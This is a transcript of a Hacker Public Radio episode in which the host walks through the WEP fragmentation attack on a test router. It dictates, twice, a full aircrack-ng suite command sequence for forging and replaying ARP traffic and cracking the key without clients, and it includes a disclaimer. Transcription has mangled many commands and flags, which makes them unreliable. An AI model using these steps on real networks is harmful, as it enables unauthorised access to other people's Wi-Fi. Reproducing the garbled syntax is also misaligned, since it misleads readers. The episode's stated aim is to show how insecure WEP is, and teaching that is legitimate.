Well, hello, HPR listeners. This is Phoenix, the Student Hacker's Guide to Linux, and surprise, surprise, I'm your host, Phoenix. Today I want to talk about the fragmentation attack used for hacking web, basically. Before I start off, there's a couple of things that I'd like to quickly mention. First and foremost, I'm actually recording this slightly different from the way that I normally record episodes like this. Normally I write a script and a sort of script and I kind of stick around there and work with that. However, this time I've kind of decided to just record and talk about it. Obviously, if you like the way that I used to do things, please drop us a line. If I like the way that I used to do things, I'll go back to the other way as well. So this is just kind of like a little experiment. Hopefully it will be a bit better, but maybe not. I'd also like to take this opportunity to apologize to Enigma and to you guys at HPR as well. I was booked in to release an episode on the 31st of July. However, I started a new job, and I also came down with a pretty tough viral infection. It's kind of had me pretty waylaid for the past 2 weeks. So if I cough and sneeze all the way through this, you'll know why. But I'm hoping that this episode will go a long way to getting you guys to forgive me anyway. So that's kind of the stuff I wanted to get out of the way first. So let's get on to the meat and potatoes of what I'm talking about today. I've been very interested in WEP for quite some time. The numbers are reasons why. I mean, the reason that I do a lot of looking at WEP is that an awful lot of people still use WEP, which always surprises me because the vulnerabilities in WEP are not unknown. This is very well-documented issues in WEP and have been for quite some time. However, there's still organizations and there's still businesses that are using it. And it's a very, very vulnerable technology, to say the least. The fragmentation attack came around in about 2007. I don't really want to get overly technical about it. What I really want to do is just kind of run through the attack so that you guys can see how it works. And then I'm going to release some sort of show notes over at the Linux Society. And I'll give you the URL for that later on, probably at the end. And in there, I'll put lists of stuff that I refer to and packages that you'll need to install and maybe just a demo of it. But what the fragmentation attack does is basically, you know, I'll put some light on what I was doing earlier on today with it. I set up a wireless network with a 128-bit random web key, okay? I then used a fragmentation attack to basically hack the wireless network. There was no clients attached to the wireless network, and I managed to produce the web key in less than 4 minutes. I think it was about 3 minutes, 52 seconds, if you're being precise. And that's for 128-bit. When I did the same test on 64-bit, it took less than a minute. By the time the package had loaded up, it told me what the key was. The big kind of indicators here is that you don't need any clients attached to the wireless network. Some of you guys that may have experience in web hacking maybe are used to this concept of needing to have people associated with the wireless network to generate traffic, to collect weak IVs that way. Well, what this attack does is takes that whole need to have clients out, and what you do is you're able to produce the traffic. And because you're able to produce the traffic, you're able to get as many IVs as you need. Why I really kind of wanted to show light on this attack is the reality of it is now when a hacker finds a wireless network that has web encryption, there isn't a real-time deterrent for them anymore, I have to be honest with you. I mean, the reason that WEP was used is that the vulnerabilities in WEP were well known before it became popular. But the argument was is that it would still be time-consuming for a hacker to basically hack WEP and that they would move to an open network. Well, the reality of this attack now is it's not a question if the hacker can get onto the network, but more of a question of it'll take me 5 minutes until I get online, and that's pretty ill. That's no real deterrent. I'll have to dig up the paper, but I believe the JANET, which is the Joint Academic Network, basically it's a, kind of like an academic ISP in the UK, have dropped web. They don't recommend it. However, there are still UK ISPs that are sending out boxes, the routers basically, with 64-bit web encryption. And they're sending these out to businesses and to homes. I can't mention any names for obvious reasons. But yeah, this technology is this antiquated technology that's causing problems, that's very easy to crack, is being shipped out left, right, and center. And the real issue with this is that it's a false sense of security that we're offering people. They're not, they're sitting there thinking that the wireless network is secured. And hopefully by the end of this episode today, I'll show you that it's far from being secured. but yeah, I'm going to stop rambling, and I suppose it's time to get on to the meat and potatoes of what I'm actually going to talk about today. Okay, I suppose the next thing I need to do is do the technology kind of health warnings and sort of disclaimer bit. Obviously, I'm doing this for educational purposes. I don't condone you hacking anyone's network. I don't promote it. If you go and hack someone's wireless network and you don't have permission to do it, and you get caught, you're on your own. At the end of the day, this is purely for demonstration purposes. Also, I'm not going to go through every possible combination of how you can do this. The technology, the platform that I use today to do this hack is I use the Triple E. I've got Ubuntu Triple E running on there. Very nice, I must admit. My commands are for that. There is a distro called Backtrack 3. I'm sure most of you guys know it. And that has all the tools that you could possibly need to do this sort of attack on as well. So there's lots of options, but it's basically your prerogative to match your configurations to mine. Okay. I suppose what we need to do now is get on with hacking a wireless network. Some of the packages that you're going to need for this is going to be AirMon NG, AirPlay NG, and PacketForge NG, and AirCrack NG. You should be able to get most of these packages through repositories or download and compile from source. Should be pretty easy. Okay, so what I did, just to give you a rough idea, is I got a separate wireless router so that I wasn't interfering with anyone's network. And I set this up to be called Phoenix Wireless Network. Very original, I know. I then went to a website that generates random keys, and I generated a random 128-bit key, and then used that. Now, before I start, it's probably well worth mentioning that there is an absolute ton of video how-to guides that are probably going to do a job a lot better than I am. If you just go onto YouTube and do a search for web fragmentation attack, there's tons and tons of really, really good how-to guides on this. So like I say, you know, like I said before, this is not an undocumented hack by any imagination. One that I saw that I thought was very, very clever, and often you find these clever things are normally the simplest things. In this attack, you need to call the MAC address of the AP quite a bit. You need to call the MAC address of your wireless card quite a bit. And what he did right at the beginning of the attack was put in export space AP equals, and then the MAC address of the AP. And then he did export space Wi-Fi equals, and then the MAC address of his wireless card. Which, to be honest with you, later on will make a lot more sense. But what he then does is in the commands, he's able to call the variable, which is a lot easier than having to constantly type in MAC addresses. I can tell you that for nothing. Some of the packages that you, well, the packages you are going to need, you should find them in most packet repositories, packet managers, and you'll be able to go to the websites and stuff like that. There's a package called airmon-ng. You'll definitely need that. You'll definitely need airplay-ng. You're definitely going to need a package called packetforge-ng as well. And I think you're going to need to get a copy of aerodump-ng and aircrack as well. But anyway, what I'll do is I'll go through the commands that I've used. And what I'll do is I'm just going to refer to AP when I'm meaning I'm going to say variable AP when I'm actually meaning the MAC address and the AP point, and I'm going to say, you know, variable Wi-Fi when I'm meaning the MAC address of the wireless card. Okay, I know this sounds a little bit confusing, but I'll try and write it up in the show notes. It'll make a lot more sense. Okay, the first command. These are all root commands, but because I'm using Ubuntu, they've all got sudo before it. But like you say, these will work fine in a root terminal. The first one I used was sudo airmon-ng start Wi-Fi 0, and what that did was that called airmon to start on basically my wireless card, which is Wi-Fi 0. I used sudo wlan config ath0 destroy. That just got rid of anything in the ath0 section. I did sudo ifconfig ath1 up, and ath1 is the device that I'm using for the hack. Okay. The next one was sudo iwconfig ath1 mode monitor channel 13. Okay, what this does is puts your card into basically a promiscuous mode. The AP that I wanted to hack happened to be on channel 13. Unlucky for some. Next command. Okay, this is a bit of a mouthful. So what it is sudo airplay-ng space -1 space 0 space -e. And in here you want to put in the wireless network's name. So in my case it was Phoenix Wireless Network space -a. And in here you want to put the AP of the MAC address of the AP. So what you would be able to do, variable AP if you did what I said earlier on, otherwise just paste in the MAC address of the one that you want to attack, space -h space. This will be your MAC address of your wireless card. So if you declared that variable, it would have been $Wi-Fi space ath1. Okay, so just to kind of read that back without all the stopping and starting, it's basically sudo airplay ng space -i space 0 space -e Phoenix Wireless Network space -a space $AP space -h space $Wi-Fi space ath1. The next command that you want to use is sudo airplay ng. Okay, so that's sudo airplay ng space -5 space -b $AP space -h space $Wi-Fi space ath1. So basically that's the sudo airplay ng -5 space b, the MAC address of your AP. So if you declared that variable again, this is why I said at the beginning, it's well worth doing, declaring that variable, because you just spend your lifetime putting these back in again. Okay, so sudo airplay space -5 space b space $AP space h $Wi-Fi space ath1. Okay, the next package that you're going to use is a package called packetforge-ng. Okay, now this command is a bit of a mouthful, but what you'll find from the first command is that you'll get a package called fragment-whatever the date of when you did it, whatever the time was, .xor, and you'll be calling this in the next command. Which is, there's no need for sudo on this, but it's packetforge-ng space -o space -a space $AP space -h space $Wi-Fi space -k space 255.255.255.255 space -l(255.255.255.255)-y the fragmentation file .xor -w(app-request). Okay, so that's packet forge -o -a the BSSID MAC address -h the MAC address of your wireless card -k -255.255.255.255(l)255.255.255.255)-y fragmentation file .xr -w(app-request). Okay, what that'll do is that'll forge basically an ARP request. Okay, the next command that you want to run is sudo aerodump -ng -c(13), because that's the channel that I'm on, --BSSID $AP -w capture -ath1. Okay, what that'll do is that'll open up a terminal. What that'll do is that needs to run in the background. So what you need, once you've got that command open, what you need to do now is move into another terminal. Make sure that you're certainly in the working directory where that ARP request that you use package forge was for. Okay, open up a new terminal, and it'll be sudo airplay-ng -2 -r (ARP request) (ath1). That's ARP-request. That's the file that we made with packet forge, okay? And you need to leave that running in its own terminal. And then what you need to do is open up one more terminal and type in sudo -aircrack-ng -z *.cap -z. And what this will do is this will load up everything that ends .cap that you've been making in the past, and it will start running its attack against them. And the great thing about this is that this can run while you're collecting AVs, okay? So what you should be left off with now is you should be left with three terminal windows open, okay? One sending this forged ARP request, one monitoring the downloads and collecting them, and the other one cracking the IVs, okay? And that's it. That's it in a nutshell. You should get a screen. If you're cracking 128-bit, it will probably take you a couple of minutes. If you're cracking 64-bit, you should probably get a response pretty much within a minute. And what it will do is it will tell you that it's found the key. And from there, it will give you the hex for the WEP or the ASCII as well. Okay, so a quick run through those commands again, okay, is first, like I say, my recommendation is to put some variables at the beginning of this. So like I say, it's probably best to declare the variables now. So export /AP equals, and then put the MAC address of the AP point there, okay? The next one would be export /Wi-Fi equals the MAC address of your wireless card, okay? The commands are as followed. It's sudo airmon-ng *wifi0. The next one is sudo wlan config /ath0 destroy. The next one is sudo ifconfig /ath1 up. The next one is sudo iwconfig /ath1 mode monitor channel 13. The next one will be sudo airplay-ng -i (o)-e (Phoenix Wireless Network), in your case the wireless network that you're hacking, -a (AP)-h (Wi-Fi) (ath1). Okay. Next command, sudo airplay-ng (5)-b (AP)-h (Wi-Fi) (ath1). Okay. The next one is to use the packet forge program. So, like I say, in this you need packet forge -ng (0)-a (AP)-h (Wi-Fi) (k) space, okay, 255.255.255.255 space dash L space 255.255.255.255 space dash Y space fragmentation file that you've made .xor space dash W space up dash request. Okay. The next command you need is sudo aerodump dash ng space dash c space channel 13. Well, this is just the number that don't type channel 13, just have sudo aerodump dash ng space dash c space 13 space dash dash bssid space $ap space dash w space capture space ath1. Okay. Then you'll need to open up another terminal window and leave that running in there. And then in this one, it would be sudo airplay-ng space dash 2-r arp dash request ath1. So sudo airplay-ng space dash 2 space dash r space arp dash request space ath1. Leave that running, open up another terminal window. And then if you type in there, sudo aircraft-nj space dash z space star dot cap space dash z, and that should crack your IVs for you. Well, as promised, there's some show notes to go along with this podcast. You can find it our website, which is www.thelinuxsociety.org.uk. That's www.thelinuxsociety.org.uk. And if you just go there and look for my blog, which should be Phoenix's blog, you'll find basically a quick guide of how I did this. Any links or anything like that that I thought were interesting, all of that sort of stuff. And that kind of brings us to the end. I hope you've enjoyed it and, you know, you've learnt a little bit about how insecure WEP actually is. Before I go, I would just like to do a quick shout out to my pal Chad Wallenberg over at the Linux Basement. Very cool Linux podcast. I started off doing these things for him over there, so I'm here today thanks to the Linux Basement. So a big shout out to you, dude, and keep on rocking with those songs, all right? Anyway, thanks very much for listening, guys, and have a good night.
Thank you for listening to Hack Republic Radio. HPR is sponsored by Caro.net, so head on over to caro.net for all your hosting needs. We'll be right back.